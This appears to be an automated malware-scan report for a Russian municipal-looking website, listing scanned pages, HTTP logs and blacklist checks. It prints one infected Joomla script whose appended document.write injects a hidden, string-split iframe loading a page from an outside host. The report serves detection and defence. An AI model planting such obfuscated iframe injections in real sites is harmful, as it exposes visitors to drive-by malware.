Scanned pages/files
Request | Server response | Status |
http://olginskiy.ru/ | 200 OK Content-Length: 48237 Content-Type: text/html | clean |
http://olginskiy.ru/media/system/js/caption.js | 200 OK Content-Length: 2227 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.ge container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); document.write('<iframe src="'+'ht'+'tp://b'+'arbu'+'ch'+'er'+'on.ca/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="0" height="0" frameborder="0"></iframe>'); Antivirus reports:
| ||
http://olginskiy.ru/index.php/ludy | 200 OK Content-Length: 22531 Content-Type: text/html | clean |
http://olginskiy.ru/index.php/nattar | 200 OK Content-Length: 54144 Content-Type: text/html | clean |
http://olginskiy.ru/index.php/prijem | 200 OK Content-Length: 24246 Content-Type: text/html | clean |
http://olginskiy.ru/media/system/js/validate.js | 200 OK Content-Length: 4411 Content-Type: application/javascript | clean |
http://olginskiy.ru/index.php?Itemid=25&option= | 404 Not Found Content-Length: 1844 Content-Type: text/html | clean |
http://olginskiy.ru/index.php | 200 OK Content-Length: 48258 Content-Type: text/html | clean |
http://olginskiy.ru/index.php/lhome | 200 OK Content-Length: 48036 Content-Type: text/html | clean |
http://olginskiy.ru/index.php/l-ludy | 200 OK Content-Length: 22542 Content-Type: text/html | clean |
http://olginskiy.ru/index.php/sovdep | 200 OK Content-Length: 24900 Content-Type: text/html | clean |
http://olginskiy.ru/index.php/l-goics | 200 OK Content-Length: 19312 Content-Type: text/html | clean |
http://olginskiy.ru/index.php/l-nattar | 200 OK Content-Length: 30693 Content-Type: text/html | clean |
http://olginskiy.ru/index.php/postanovlenia | 200 OK Content-Length: 41421 Content-Type: text/html | clean |
http://olginskiy.ru/index.php/l-torgy | 200 OK Content-Length: 21002 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: olginskiy.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Tue, 01 Jul 2014 12:45:13 GMT
Pragma: no-cache
Server: Jino.ru/mod_pizza
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 01 Jul 2014 12:45:13 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: d31a99b8bc2e1d540633075fdeb6b0a8=f066c403fd3b4cc679e0d98f4a340bf9; path=/
GET / HTTP/1.1
Host: olginskiy.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Tue, 01 Jul 2014 12:45:13 GMT
Pragma: no-cache
Server: Jino.ru/mod_pizza
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 01 Jul 2014 12:45:13 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: d31a99b8bc2e1d540633075fdeb6b0a8=f066c403fd3b4cc679e0d98f4a340bf9; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: olginskiy.ru
Referer: http://www.google.com/search?q=olginskiy.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: olginskiy.ru
Referer: http://www.google.com/search?q=olginskiy.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=olginskiy.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://olginskiy.ru/
Result: olginskiy.ru is not infected or malware details are not published yet.
Result: olginskiy.ru is not infected or malware details are not published yet.